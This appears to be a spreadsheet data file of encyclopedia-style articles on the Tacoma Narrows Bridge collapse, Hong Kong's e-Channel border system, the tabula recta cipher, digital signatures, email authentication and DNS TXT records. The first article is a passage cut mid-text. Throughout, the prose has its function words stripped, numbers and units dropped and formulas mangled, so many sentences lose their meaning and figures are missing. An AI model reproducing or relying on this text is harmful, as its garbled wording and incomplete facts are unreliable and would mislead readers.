bridge collapse, wind steady miles hour km/h) frequency destructive mode cycles/minute (0.2 hz). this frequency neither natural mode isolated structure frequency blunt-body vortex shedding bridge wind speed, approximately concluded therefore vortex shedding cause bridge collapse. event understood considering coupled aerodynamic structural system requires rigorous mathematical analysis reveal degrees freedom particular structure design loads imposed. vortex-induced vibration complex process involves external wind-initiated forces internal self-excited forces lock motion structure. during lock-on, wind forces drive structure near natural frequencies, amplitude increases effect changing local fluid boundary conditions, induces compensating, self-limiting forces, restrict motion relatively benign amplitudes. this clearly linear resonance phenomenon, even bluff body linear behaviour, since exciting force amplitude nonlinear force structural response. resonance non-resonance explanations billah scanlan state edson biography theodore kármán source misinformation: "the culprit tacoma disaster karman vortex street." however, federal works administration report investigation, kármán part, concluded improbable resonance alternating vortices plays important role oscillations suspension bridges. first, found sharp correlation wind velocity oscillation frequency required case resonance vortices whose frequency depends wind velocity. group physicists cited "wind-driven amplification torsional oscillation" distinct resonance: subsequent authors rejected resonance explanation, perspective gradually spreading physics community. user's guide current american association physics teachers (aapt) states bridge collapse "was case resonance." bernard feldman likewise concluded 2003 article physics teacher torsional oscillation mode, resonance behavior amplitude function wind velocity." important source aapt user's guide feldman 1991 american journal physics article yusuf billah robert scanlan. according engineers, failure bridge related wind-driven amplification torsional oscillation that, unlike resonance, increases monotonically increasing wind speed. fluid dynamics behind amplification complicated, element, described physicists daniel green william unruh, creation large-scale vortices roadway, deck, bridge. nowadays, bridges constructed rigid mechanisms damp oscillations. sometimes include slot middle deck alleviate pressure differences road. degree debate lack commonly accepted precise definition resonance. billah scanlan provide following definition resonance general, whenever system capable oscillation acted periodic series impulses frequency equal nearly equal natural frequencies oscillation system, system oscillation relatively large amplitude." they state later paper "could called resonant phenomenon? would appear contradict qualitative definition resonance quoted earlier, identify source periodic impulses self-induced, wind supplying power, motion supplying power-tapping mechanism. wishes argue, however, case externally forced linear resonance, mathematical distinction quite clear, self-exciting systems differing strongly enough ordinary linear resonant ones." link armistice blizzard weather system caused bridge collapse went cause 1940 armistice blizzard killed people midwestern united states: strong winds tacoma narrows november 1940 related remarkable low-pressure system followed track across country four days later produced armistice storm, greatest storms ever strike great lakes region. example, storm reached illinois, headline front page chicago tribune included words "heaviest winds century smash city." additional details film video analysis found november 2015 issue physics teacher, also includes description armistice storm strong winds earlier caused tacoma narrows bridge oscillate, twist, collapse waters below. fate collapsed superstructure efforts salvage bridge began almost immediately collapse continued 1943. review boards, appointed federal government appointed state washington, concluded repair bridge impossible, entire bridge would dismantled entirely bridge superstructure built. with steel valuable commodity involvement united states world steel bridge cables suspension span sold scrap metal melted down. salvage operation cost state returned sale material, loss $350,000 (equivalent $5.5 million today).the cable anchorages, tower pedestals remaining substructure relatively undamaged collapse, reused construction replacement span opened 1950. towers, supported main cables road deck, suffered major damage bases deflected feet (3.7 towards shore result collapse mainspan sagging sidespans. they dismantled, steel sent recyclers. preservation collapsed roadway underwater remains highway deck suspension bridge large artificial reef, listed national register historic places reference number 92001068.the harbor history museum display main gallery regarding 1940 bridge, collapse, subsequent bridges. lesson history othmar ammann, leading bridge designer member federal works agency commission investigating collapse tacoma narrows bridge, wrote: tacoma narrows bridge failure given invaluable information shown [that] every structure [that] projects fields magnitude involves problems solution neither theory practical experience furnish adequate guide. must rely largely judgment result, errors, failures occur, must accept price human progress. following incident, engineers took extra caution incorporate aerodynamics designs, wind tunnel testing designs eventually made mandatory.the bronx–whitestone bridge, similar design 1940 tacoma narrows bridge, reinforced shortly collapse. fourteen-foot-high (4.3 steel trusses installed sides deck 1943 weigh stiffen bridge effort reduce oscillation. 2003, stiffening trusses removed aerodynamic fiberglass fairings installed along sides road deck. consequence suspension bridges reverted deeper heavier truss design, including replacement tacoma narrows bridge (1950), development 1960s girder bridges airfoil shape severn bridge, gave necessary stiffness together reduced torsional forces. replacement bridge because shortages materials labor result involvement united states world took years replacement bridge opened traffic. this replacement bridge opened traffic october 1950, 5,979 feet (1,822 long, forty feet longer original bridge. replacement bridge also lanes original bridge, traffic lanes, plus shoulders sides. half century later, replacement bridge exceeded traffic capacity, second, parallel, suspension bridge constructed carry eastbound traffic. suspension bridge completed 1950 reconfigured carry westbound traffic. parallel bridge opened traffic july 2007. also list bridge failures list structural failures collapses engineering disasters millennium bridge, london, engineering error silver bridge volgograd bridge, bridge russia experienced similar problems wind humen pearl river bridge references notes further reading "the strangest, most spectacular bridge collapse (and wrong)" (december 2015). detailed, in-depth investigative report complicated physics behind collapse layman's terms, videos, charts, graphs, diagrams, etc. alex pasternack, motherboard physics behind collapse bridge failurebydesign.info physics presentation resources malík, josef (2013). "sudden lateral asymmetry torsional oscillations original tacoma suspension bridge". journal sound vibration. (15): 3772–3789. bibcode:2013jsv...332.3772m. doi:10.1016/j.jsv.2013.02.011. external links color video original bridge's construction collapse narration photos bridge span construction tacoma narrows bridge (1940) structurae historical 1940 narrows bridge (1940 bridge construction) washington state department transportation history tacoma narrows bridge university washington libraries digital collection tacoma narrows bridge collection more images text documenting infamous collapse 1940 tacoma narrows bridge. also covers galloping gertie's creation, subsequent studies involving aerodynamics, finally construction second bridge spanning narrows. tacoma narrows bridge disaster, november 1940 images failure information images failure official site tacoma narrows bridge timeline bridges tacoma narrows bridge suspended animation failure magazine (november 2000) film clip tacoma narrows bridge wobbling eventually, collapsing available internet archive youtube video similar deck oscillations bridge volgograd russia</t>
  </si>
  <si>
    <t>E-Channel</t>
  </si>
  <si>
    <t>e-channel, also known automated passenger clearance system, expedited border control system introduced hong kong immigration department 2004, designed speed border immigration processes residents hong kong, macau frequent visitors hong kong entering exiting territory whether land, self-service kiosks employed various border control points. basic requirements hong kong permanent resident aged (using smart identity card) hong kong resident aged holding document identity visa purposes (using smart identity card carrying valid document identity visa purposes) person aged right land unconditional stay hong kong (using smart identity card) non-permanent resident issued notification label (using smart identity card carrying valid travel document) registered cross-boundary primary school student (using enrolled valid travel document) registered frequent visitor aged (using enrolled valid travel document) registered macau permanent resident aged (using macau permanent identity card) registered south korean citizen aged enrolled smart entry service (ses) scheme (using republic korea passport valid least months adverse record hksar) enrolled holder singaporean passport aged (using republic singapore passport valid least months, completed trips past months adverse record hksar) enrolled holder german passport aged (using federal republic germany passport valid least months adverse record hksar) enrolled holder australian passport aged (using australian passport valid least months adverse record hksar)the user upon entrance e-channel inserts hong kong identity card card reader places registered travel document macau identity card onto document reader. gate opens user steps scans fingerprint allows entry hong kong. locations first made available december 2004 control point, past several years locations expanded include: hong kong international airport hung chau spur line chau shenzhen hong kong china ferry terminal hong kong–macau ferry terminal cruise terminal tuen ferry terminalby allowing registered users utilise self-service kiosks pass hong kong immigration, processing time averages around seconds making e-channels efficient traditional immigration counters. macau since first inception right abode hong kong permanent identity card holders permitted self-service kiosks, program expanded september 2006; allowing right land unconditional stay hong kong also residents non-residents notification labels e-channels. program expanded december 2009 allow holders macau resident identity card register hong kong e-channels enter exit territory. vice versa, macau reciprocated e-channels hong kong card holders register well. border cities macau hong kong mainland china's side zhuhai shenzhen (respectively) e-channels home return permit cards. example: hong kong resident arrives passes hong kong's e-channel hong kong identity card allowing exit hong kong, upon approaching border check point shenzhen, uses home return permit china's e-channel enter mainland china. thereby cutting time compared using traditional immigration counters. hong kong resident departs hong kong-macau ferry terminal clearing hong kong immigration e-channel, upon arrival macau's outer harbour ferry terminal, hong kong identity card clear macau's e-channels, instead queuing immigration counters. frequent visitor automated passenger clearance macau resident card holders permitted register program frequent visitors hong kong register well. frequent visitor automated passenger clearance would require valid travel document multiple visit visa applicable), plus following documents: valid hksar travel pass apec business travel card economy code ‘hkg’ hong kong international airport frequent visitor card frequent flyer programme membership card issued airline joined arrangement e-channel service foreign nationals frequent visitor program expanded nationals following countries. such arrangements reciprocal eligible hksar passport holders also enrol respective automated border clearance schemes countries: republic korea enrolled smart entry service (ses) scheme (since december 2013) singapore (since september 2014) germany (since november 2014) australia (since june 2016) stop customs immigration clearance special vehicular e-channel erected shenzhen known stop customs immigration clearance goods vehicle passing shenzhen control point, indicating versatile system asset hong kong immigration department. also smartgate similar system operated australia zealand epassport gates similar system operated united kingdom smart entry service similar system operated republic korea global entry nexus airport entry port entry references</t>
  </si>
  <si>
    <t>Tabula recta</t>
  </si>
  <si>
    <t>cryptography, tabula recta (from latin tabula rēcta) square table alphabets, made shifting previous left. term invented german author monk johannes trithemius 1508, used trithemius cipher. trithemius cipher trithemius cipher published johannes trithemius book polygraphia, credited first published printed work cryptology.trithemius used tabula recta define polyalphabetic cipher, equivalent leon battista alberti's cipher disk except order letters target alphabet mixed. tabula recta often referred discussing pre-computer ciphers, including vigenère cipher blaise vigenère's less well-known autokey cipher. polyalphabetic ciphers based caesar cipher described terms tabula recta. tabula recta uses letter square letters alphabet followed rows additional letters, shifted left this, essence, creates different caesar ciphers.the resulting ciphertext appears random string block data. variable shifting, natural letter frequencies hidden. however, codebreaker aware method used, becomes easy break. cipher vulnerable attack lacks key, thus violating kerckhoffs's principle cryptology. improvements 1553, important extension trithemius's method developed giovan battista bellaso, called vigenère cipher. bellaso added key, used dictate switching cipher alphabets letter. this method misattributed blaise vigenère, published similar autokey cipher 1586. classic trithemius cipher (using shift one) equivalent vigenère cipher abcdefghijklmnopqrstuvwxyz key. also equivalent caesar cipher shift increased letter, starting usage within body tabula recta, alphabet shifted letter left this forms rows shifted alphabets, ending alphabet starting shown image). separate alphabets header header column left, containing letters alphabet order. tabula recta used several equivalent ways encrypt decrypt text. most commonly, left-side header column used plaintext letters, encryption decryption. that usage described herein. order decrypt trithemius cipher, first locates tabula recta letters decrypt: first letter first interior column, second letter second column, etc.; letter directly left, header column, corresponding decrypted plaintext letter. assuming standard shift used, encrypted text hfnos would decrypted hello (h-&gt;h, f-&gt;e, n-&gt;l, o-&gt;l, s-&gt;o example, decrypt second letter text, first find within second interior column, move directly left, leftmost header column, find corresponding plaintext letter: data encrypted opposite fashion, first locating plaintext letter message leftmost header column tabula recta, mapping appropriate corresponding letter interior columns. example, first letter message found within left header column, mapped letter directly across column headed "a". next letter mapped corresponding letter column headed "b", continues entire message encrypted. trithemius cipher thought abcdefghijklmnopqrstuvwxyz, encryption process also conceptualized finding, letter, intersection containing letter encrypted column corresponding current letter key. letter column cross ciphertext letter. programmatically, cipher computable, assigning 1... {\displaystyle a=0,b=1...} encryption process {\displaystyle ciphertext=(plaintext+key)\!\!\!\!{\pmod {26}}} decryption follows process, exchanging ciphertext plaintext. defined value letter companion ciphertext running cipher, constant caesar cipher, zero-based counter period trithemius's usage. references citations sources salomon, david (2005). coding data computer communications. springer. isbn 0-387-21245-0. salomon, david (2003). data privacy security. springer. isbn 0-387-00311-8. king, francis (1989). modern ritual magic: rise western occultism (2nd ed.). prism press. isbn 1-85327-032-6. kahn, david (1996). codebreakers. simon schuster. isbn 0-684-83130-9.</t>
  </si>
  <si>
    <t>E-imza</t>
  </si>
  <si>
    <t>digital signature mathematical scheme verifying authenticity digital messages documents. valid digital signature, prerequisites satisfied, gives recipient high confidence message created known sender (authenticity), message altered transit (integrity).digital signatures standard element cryptographic protocol suites, commonly used software distribution, financial transactions, contract management software, cases important detect forgery tampering. digital signatures often used implement electronic signatures, includes electronic data carries intent signature, electronic signatures digital signatures. electronic signatures legal significance countries, including canada, south africa, united states, algeria, turkey, india, brazil, indonesia, mexico, saudi arabia, uruguay, switzerland, chile countries european union.digital signatures employ asymmetric cryptography. many instances, provide layer validation security messages sent non-secure channel: properly implemented, digital signature gives receiver reason believe message sent claimed sender. digital signatures equivalent traditional handwritten signatures many respects, properly implemented digital signatures difficult forge handwritten type. digital signature schemes, sense used here, cryptographically based, must implemented properly effective. they also provide non-repudiation, meaning signer cannot successfully claim sign message, also claiming private remains secret. further, non-repudiation schemes offer timestamp digital signature, even private exposed, signature valid. digitally signed messages anything representable bitstring: examples include electronic mail, contracts, message sent cryptographic protocol. definition digital signature scheme typically consists three algorithms: generation algorithm selects private uniformly random possible private keys. algorithm outputs private corresponding public key. signing algorithm that, given message private key, produces signature. signature verifying algorithm that, given message, public signature, either accepts rejects message's claim authenticity.two main properties required. first, authenticity signature generated fixed message fixed private verified using corresponding public key. secondly, computationally infeasible generate valid signature party without knowing party's private key. digital signature authentication mechanism enables creator message attach code acts signature. digital signature algorithm (dsa), developed national institute standards technology, many examples signing algorithm. following discussion, refers unary number. formally, digital signature scheme triple probabilistic polynomial time algorithms, satisfying: (key-generator) generates public (pk), corresponding private (sk), input security parameter. (signing) returns tag, inputs: private (sk), string (x). (verifying) outputs accepted rejected inputs: public (pk), string (x), (t).for correctness, must satisfy (pk, g(1n), s(sk, accepted digital signature scheme secure every non-uniform probabilistic polynomial time adversary, (pk, g(1n), as(sk, )(pk, 1n), v(pk, accepted] negl(n),where as(sk, denotes access oracle, s(sk, denotes queries made knows public key, security parameter, denotes adversary directly query string, history 1976, whitfield diffie martin hellman first described notion digital signature scheme, although conjectured schemes existed based functions trapdoor one-way permutations. soon afterwards, ronald rivest, shamir, adleman invented algorithm, could used produce primitive digital signatures (although proof-of-concept "plain" signatures secure). first widely marketed software package offer digital signature lotus notes 1.0, released 1989, used algorithm.other digital signature schemes soon developed rsa, earliest lamport signatures, merkle signatures (also known "merkle trees" simply "hash trees"), rabin signatures.in 1988, shafi goldwasser, silvio micali, ronald rivest became first rigorously define security requirements digital signature schemes. they described hierarchy attack models signature schemes, also presented signature scheme, first could proved prevent even existential forgery chosen message attack, currently accepted security definition signature schemes. first scheme built trapdoor functions rather family function much weaker required property one-way permutation presented moni naor moti yung. method digital signature scheme many) based rsa. create signature keys, generate pair containing modulus, product random secret distinct large primes, along integers, (mod φ(n)), euler's totient function. signer's public consists signer's secret contains sign message, signer computes signature, (mod modular exponentiation operation. verify, receiver checks (mod several early signature schemes similar type: involve trapdoor permutation, function, case rabin signature scheme, computing square modulo composite, trapdoor permutation family family permutations, specified parameter, easy compute forward direction, difficult compute reverse direction without already knowing private ("trapdoor"). trapdoor permutations used digital signature schemes, computing reverse direction secret required signing, computing forward direction used verify signatures. used directly, type signature scheme vulnerable key-only existential forgery attack. create forgery, attacker picks random signature uses verification procedure determine message, corresponding signature. practice, however, type signature used directly, rather, message signed first hashed produce short digest, padded larger width comparable signed reverse trapdoor function. this forgery attack, then, produces padded hash function output corresponds message leads value, lead attack. random oracle model, hash-then-sign idealized version practice hash padding combined close possible outputs), form signature existentially unforgeable, even chosen-plaintext attack.there several reasons sign hash message digest) instead whole document. efficiency signature much shorter thus save time since hashing generally much faster signing practice. compatibility messages typically strings, signature schemes operate domains (such case rsa, numbers modulo composite number hash function used convert arbitrary input proper format. integrity without hash function, text signed" split (separated) blocks small enough signature scheme directly. however, receiver signed blocks able recognize blocks present appropriate order. applications organizations move away paper documents signatures authenticity stamps, digital signatures provide added assurances evidence provenance, identity, status electronic document well acknowledging informed consent approval signatory. united states government printing office (gpo) publishes electronic versions budget, public private laws, congressional bills digital signatures. universities including penn state, university chicago, stanford publishing electronic student transcripts digital signatures. below common reasons applying digital signature communications: authentication although messages often include information entity sending message, information accurate. digital signatures used authenticate identity source messages. when ownership digital signature secret bound specific user, valid signature shows message sent user. importance high confidence sender authenticity especially obvious financial context. example, suppose bank's branch office sends instructions central office requesting change balance account. central office convinced message truly sent authorized source, acting request could grave mistake. integrity many scenarios, sender receiver message need confidence message altered transmission. although encryption hides contents message, possible change encrypted message without understanding (some encryption algorithms, called nonmalleable, prevent this, others not.) however, message digitally signed, change message signature invalidates signature. furthermore, efficient modify message signature produce message valid signature, still considered computationally infeasible cryptographic hash functions (see collision resistance). non-repudiation non-repudiation, specifically non-repudiation origin, important aspect digital signatures. property, entity signed information cannot later time deny signed similarly, access public enable fraudulent party fake valid signature. note authentication, non-repudiation etc. properties rely secret revoked prior usage. public revocation key-pair required ability, else leaked secret keys would continue implicate claimed owner key-pair. checking revocation status requires "online" check; e.g., checking certificate revocation list online certificate status protocol. very roughly analogous vendor receives credit-cards first checking online credit-card issuer find given card reported lost stolen. course, stolen pairs, theft often discovered secret key's use, e.g., sign bogus certificate espionage purpose. notions security foundational paper, goldwasser, micali, rivest hierarchy attack models digital signatures: key-only attack, attacker given public verification key. known message attack, attacker given valid signatures variety messages known attacker chosen attacker. adaptive chosen message attack, attacker first learns signatures arbitrary messages attacker's choice.they also describe hierarchy attack results: total break results recovery signing key. universal forgery attack results ability forge signatures message. selective forgery attack results signature message adversary's choice. existential forgery merely results valid message/signature pair already known adversary.the strongest notion security, therefore, security existential forgery adaptive chosen message attack. additional security precautions putting private smart card public private cryptosystems depend entirely keeping private secret. private stored user's computer, protected local password, disadvantages: user sign documents particular computer security private depends entirely security computera secure alternative store private smart card. many smart cards designed tamper-resistant (although designs broken, notably ross anderson students). typical digital signature implementation, hash calculated document sent smart card, whose signs hash using stored private user, returns signed hash. typically, user must activate smart card entering personal identification number code (thus providing two-factor authentication). arranged private never leaves smart card, although always implemented. smart card stolen, thief still need code generate digital signature. this reduces security scheme system, although still requires attacker possess card. mitigating factor private keys, generated stored smart cards, usually regarded difficult copy, assumed exist exactly copy. thus, loss smart card detected owner corresponding certificate immediately revoked. private keys protected software easier copy, compromises difficult detect. using smart card readers separate keyboard entering code activate smart card commonly requires numeric keypad. some card readers numeric keypad. this safer using card reader integrated entering using computer's keyboard. readers numeric keypad meant circumvent eavesdropping threat computer might running keystroke logger, potentially compromising code. specialized card readers also less vulnerable tampering software hardware often eal3 certified. other smart card designs smart card design active field, smart card schemes intended avoid particular problems, despite security proofs far. using digital signatures trusted applications main differences digital signature written signature user "see" sign. user application presents hash code signed digital signing algorithm using private key. attacker gains control user's possibly replace user application foreign substitute, effect replacing user's communications attacker. this could allow malicious application trick user signing document displaying user's original on-screen, presenting attacker's documents signing application. protect scenario, authentication system user's application (word processor, email client, etc.) signing application. general idea provide means user application signing application verify other's integrity. example, signing application require requests come digitally signed binaries. using network attached hardware security module main differences cloud based digital signature service locally provided risk. many risk averse companies, including governments, financial medical institutions, payment processors require secure standards, like fips 140-2 level fips certification, ensure signature validated secure. wysiwys technically speaking, digital signature applies string bits, whereas humans applications "believe" sign semantic interpretation bits. order semantically interpreted, string must transformed form meaningful humans applications, done combination hardware software based processes computer system. problem semantic interpretation bits change function processes used transform bits semantic content. relatively easy change interpretation digital document implementing changes computer system document processed. from semantic perspective creates uncertainty exactly signed. wysiwys (what what sign) means semantic interpretation signed message cannot changed. particular also means message cannot contain hidden information signer unaware revealed signature applied. wysiwys requirement validity digital signatures, requirement difficult guarantee increasing complexity modern computer systems. term wysiwys coined peter landrock torben pedersen describe principles delivering secure legally binding digital signatures pan-european projects. digital signatures versus paper signatures signature could replicated document another copying image manually digitally, credible signature copies resist scrutiny significant manual technical skill, produce signature copies resist professional scrutiny difficult. digital signatures cryptographically bind electronic identity electronic document digital signature cannot copied another document. paper contracts sometimes signature block last page, previous pages replaced signature applied. digital signatures applied entire document, digital signature last page indicate tampering data pages altered, also achieved signing numbering pages contract. some digital signature algorithms ecdsa eddsa ecdsa elgamal signature scheme predecessor dsa, variants schnorr signature pointcheval–stern signature algorithm rabin signature algorithm pairing-based schemes ntrusign example digital signature scheme based hard lattice problems undeniable signatures aggregate signatureru signature scheme supports aggregation: given signatures messages users, possible aggregate signatures single signature whose size constant number users. this single signature convince verifier users indeed sign original messages. scheme mihir bellare gregory neven used bitcoin. signatures efficient protocols signature schemes facilitate efficient cryptographic protocols zero-knowledge proofs secure computation. current state legal practical most digital signature schemes share following goals regardless cryptographic theory legal provision: quality algorithms: some public-key algorithms known insecure, practical attacks discovered. quality implementations: implementation good algorithm protocol) mistake(s) work. users (and software) must carry signature protocol properly. private must remain private: private becomes known party, party produce perfect digital signatures anything. public owner must verifiable: public associated actually came bob. this commonly done using public infrastructure (pki) public key↔user association attested operator (called certificate authority). 'open' pkis anyone request attestation (universally embodied cryptographically protected public certificate), possibility mistaken attestation non-trivial. commercial operators suffered several publicly known problems. such mistakes could lead falsely signed, thus wrongly attributed, documents. 'closed' systems expensive, less easily subverted way.only conditions digital signature actually evidence sent message, therefore assent contents. legal enactment cannot change reality existing engineering possibilities, though reflected actuality. legislatures, importuned businesses expecting profit operating pki, technological avant-garde advocating solutions problems, enacted statutes and/or regulations many jurisdictions authorizing, endorsing, encouraging, permitting digital signatures providing limiting) legal effect. first appears utah united states, followed closely states massachusetts california. other countries also passed statutes issued regulations area well active model project time. these enactments proposed enactments) vary place place, typically embodied expectations variance (optimistically pessimistically) state underlying cryptographic engineering, effect confusing potential users specifiers, nearly cryptographically knowledgeable. adoption technical standards digital signatures lagged behind much legislation, delaying less unified engineering position interoperability, algorithm choice, lengths, engineering attempting provide. industry standards some industries established common interoperability standards digital signatures members industry regulators. these include automotive network exchange automobile industry safe-biopharma association healthcare industry. using separate pairs signing encryption several countries, digital signature status somewhat like traditional paper signature, 1999 digital signature directive 2014 follow-on legislation. generally, provisions mean anything digitally signed legally binds signer document terms therein. reason, often thought best separate pairs encrypting signing. using encryption pair, person engage encrypted conversation (e.g., regarding real estate transaction), encryption legally sign every message sends. only parties come agreement sign contract signing keys, legally bound terms specific document. after signing, document sent encrypted link. signing lost compromised, revoked mitigate future transactions. encryption lost, backup escrow utilized continue viewing encrypted content. signing keys never backed escrowed unless backup destination securely encrypted. also x.509 advanced electronic signature blind signature detached signature digital certificate digital signature estonia electronic notebook electronic signature electronic signatures esign (india) privacy guard public infrastructure public fingerprint server-based signatures probabilistic signature scheme notes references goldreich, oded (2001), foundations cryptography basic tools, cambridge: cambridge university press, isbn 978-0-511-54689-1 goldreich, oded (2004), foundations cryptography basic applications publ. ed.), cambridge [u.a.]: cambridge univ. press, isbn 978-0-521-83084-3 pass, rafael, course cryptography (pdf), retrieved december 2015 further reading stephen mason, signature from thirteenth century facsimile (institute advanced legal studies humanities digital library, school advanced study, university london, 2022), open source https://humanities-digital-library.org/index.php/hdl/catalog/book/signature-in-law stephen mason daniel seng, editors, electronic evidence electronic signatures (5th edn, institute advanced legal studies humanities digital library, school advanced study, university london, 2021), open source https://humanities-digital-library.org/index.php/hdl/catalog/book/electronic-evidence-and-electronic-signatures lorna brazell, electronic signatures identities regulation (3rd edn, london: sweet maxwell, 2018). jeremiah buckley, john kromer, margo tank, david whitaker, electronic signatures (3rd edition, west publishing, 2010). katz lindell, "introduction modern cryptography" (chapman hall/crc press, 2007) dennis campbell, editor, e-commerce digital signatures (oceana publications, 2005). schellenkens, electronic signatures authentication technology legal perspective, (tmc asser press, 2004). digital evidence electronic signature review free open source</t>
  </si>
  <si>
    <t>E-mail authentication</t>
  </si>
  <si>
    <t>email authentication, validation, collection techniques aimed providing verifiable information origin email messages validating domain ownership message transfer agents (mta) participated transferring possibly modifying message. original base internet email, simple mail transfer protocol (smtp), feature, forged sender addresses emails practice known email spoofing) widely used phishing, email spam, various types fraud. combat this, many competing email authentication proposals developed, fairly recently three widely adopted spf, dkim dmarc. results validation used automated email filtering, assist recipients selecting appropriate action. this article cover user authentication email submission retrieval. rationale early 1980s, simple mail transfer protocol (smtp) designed, provided real verification sending user system. this problem email systems trusted corporations universities, since commercialization internet early 1990s, spam, phishing, crimes increasingly involve email. email authentication necessary first step towards identifying origin messages, thereby making policies laws enforceable. hinging domain ownership stance emerged early 2000. implies coarse-grained authentication, given domains appear right part email addresses, sign. fine-grain authentication, user level, achieved means, pretty good privacy s/mime. present, digital identity needs managed individual. outstanding rationale email authentication ability automate email filtering receiving servers. that way, spoofed messages rejected arrive user's inbox. while protocols strive devise ways reliably block distrusted mail, security indicators unauthenticated messages still reach inbox. 2018 study shows security indicators lower click-through ratio points, 48.9% 37.2% users open spoofed messages. nature problem smtp defines message transport, message content. thus, defines mail envelope parameters, envelope sender, header (except trace information) body message itself. 5321 define smtp (the envelope), 5322 define message (header body), formally referred internet message format. smtp defines trace information message, saved header using following fields: received: smtp server accepts message inserts trace record header (last first). return-path: delivery smtp server makes final delivery message, inserts field header.a mail user agent (mua) knows outgoing mail smtp server configuration. relay server) typically determines server connect looking (mail exchange) resource record recipient's domain name. path depicted reconstructed ground trace header fields host adds header receives message: important realize first lines header usually trusted recipient. fact, lines written machines recipient's administrative management domain (admd), upon explicit mandate. contrast, lines prove involvement well purported author's could counterfeit created received: field shown epoch-making piece header. return-path: written mail delivery agent (mda), based message envelope. additional trace fields, designed email authentication, populate header. normally, messages sent author's admd directly destination's (that figures). sender's admd authentication tokens message goes boxes. common cases schematized follows: sending within admd's network (mua admd's authenticates user, either based address smtp authentication means. depending recipient address, message follow normal path pass mailing list forwarding service. outbound smtp proxy smarthost. local network block outbound port connections, user deploy "direct-to-mx" software. typically, zombies malicious hosts behave way. badly configured, also different relay, outmoded open relay, often authenticate user. roaming user (mua most times still possible one's admd msa. outbound connections port intercepted tunneled transparent proxy. configured smtp relay local network provider offers bonus. disconnected user e-card send mail behalf customer typed email addresses local keyboard; forms considered work similarly. section notes authentication methods widespread allows receiver check email claimed come specific domain comes address authorized domain's administrators. usually, domain administrator authorize addresses used outbound mtas, including proxy smarthost.the address sending guaranteed valid transmission control protocol, establishes connection checking remote host reachable. receiving mail server receives helo smtp command soon connection mail from: beginning message. both contain domain name. verifier queries domain name system (dns) matching record, exists specify addresses authorized domain's administrator. result "pass", "fail", intermediate result systems generally take account anti-spam filtering. dkim dkim checks message content, deploying digital signatures. rather using digital certificates, keys signature-verification distributed dns. that way, message gets associated domain name.a dkim-compliant domain administrator generates pairs asymmetric keys, hands private keys signing mta, publishes public keys dns. labels structured selector._domainkey.example.com, selector identifies pair, _domainkey fixed keyword, followed signing domain's name publication occurs authority domain's admd. just injecting message smtp transport system, signing creates digital signature covers selected fields header body beginning). signature cover substantive header fields from:, to:, date:, subject:, added message header itself, trace field. number relays receive forward message every hop, signature verified retrieving public dns. long intermediate relays modify signed parts message, dkim-signatures remain valid. dmarc dmarc allows specification policy authenticated messages. built existing mechanisms, sender policy framework (spf) domainkeys identified mail (dkim). allows administrative owner domain publish policy records specify mechanism (dkim, both) employed sending email domain; check from: field presented users; receiver deal failures reporting mechanism actions performed policies. other methods range methods proposed, either deprecated gained widespread support. these included sender certified server validation, domainkeys below: adsp adsp allowed specification policy messages signed author's domain. message dkim authentication first, adsp could demand punishing treatment message signed author domain(s) from: header field.adsp demoted historic november 2013. adds vouch already authenticated identity. this method requires globally recognized authorities certify reputation domains. sender apply reference vouching authority. reference, accepted, published branch managed authority. vouched sender vbr-info: header field messages sends. also dkim signature, authentication method, spf. receiver, validating sender's identity, verify vouch claimed vbr-info: looking reference. iprev applications avoid using method means authentication. nevertheless, often carried results, any, written received: header field besides information required smtp specification. reverse, confirmed looking address name found, indication properly dns. reverse resolution range addresses delegated admd uses them, remain managed network provider. latter case, useful identity related message obtained. dnswl looking dnswl (dns-based whitelist) provide assessment sender, possibly including identification. authentication-results 8601 defines trace header field authentication-results: receiver record results email authentication checks carried out. multiple results multiple methods reported field, separated semicolons wrapped appropriate. example, following field purportedly written receiver.example.org reports dkim results: first token field name, receiver.example.org, authentication server, token known authserv-id. receiver supporting 8601 responsible remove rename) false header claiming belong domain downstream filters cannot confused. however, filters still need configured, know identities domain use. mail user agent (mua), slightly harder learn identities trust. since users receive email multiple domains—e.g., multiple email addresses domains could authentication-results: fields pass looked neutral. that way, malicious sender forge authserv-id user would trust message arrived different domain. legitimate authentication-results: typically appears received: field domain message relayed. additional received: fields appear header, message transferred internally servers belonging same, trusted admd. internet assigned numbers authority maintains registry email authentication parameters. parameters need registered, though. example, local "policy" values designed site's internal only, correspond local configuration need registration. also dmarc system prevent email fraud email encryption email spoofing creating email spam phishing messages forged sender identity address ident internet protocol helps identify user particular connection secure messaging references</t>
  </si>
  <si>
    <t>TXT record</t>
  </si>
  <si>
    <t>record (short text record) type resource record domain name system (dns) used provide ability associate arbitrary text host name, human readable information server, network, data center, accounting information.it also often used structured fashion record small amounts machine-readable data dns. background domain multiple records associated provided server implementation supports this. each record turn character strings. traditionally text fields used variety non-standardised uses, full company organisation name, address host. 1993 1464 proposed simple approach storing attributes values text fields. this used extensively verification domain ownership implementation sender policy framework (spf) domainkeys identified mail (dkim) records verifying sender email messages zero-configuration networking dns-based service discovery domain-based message authentication, reporting conformance (dmarc) policiesusing records store data different purposes without problems. protocol specifies client queries specific record type (e.g., txt) certain domain name (e.g., example.com), records type must returned message. that lead large transactions lots "unnecessary" information transferred and/or uncertainty record use. there ways around this: specify domain name prefix used using records specific purpose (e.g., _domainkey.example.com dkim case) create record type entirely. former "easy" require changes dns. latter sometimes considered "cleaner" matches design database model better. past, creating record types often avoided since complicated procedure ietf. reluctance lingers people despite process replaced much lighter quicker one. format structure record specified 1035 follows. note specification silent subject character encoding text string. explicitly states interpretation string context dependent, data treated binary inside dns. later specifications (e.g., 6763 used service discovery) require specific encodings specific purposes. rdata section contain multiple consecutive occurrences (txt length txt). data length length combined. unstructured text, organisations string define, example: example.com. "this domain name reserved documentation" 1464 defines structured format used define attributes values single record, examples: host.widgets.com. "printer=lpr5" sam.widgets.com. "favorite drink=orange juice" practice, services using records often follow rfc, instead specific format. example usage character string record used spf: "v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.123 ip6:2620:0:860::/46 -all" example dmarc: "v=dmarc1;p=none;sp=quarantine;pct=100;rua=mailto:dmarcreports@example.com;" site verification: "google-site-verification=6p08ow5e-8q0m6vq7fmaqayidprkvv8fuf_7hz4qvc8" custom email service: _amazonses.example.com. "pmbgn/7mjnfhtkuz06enqq1peguaokw8lghcfwefchu=" also list record types dmarc dkim e-mail authentication references</t>
  </si>
  <si>
    <t>E-mail</t>
  </si>
  <si>
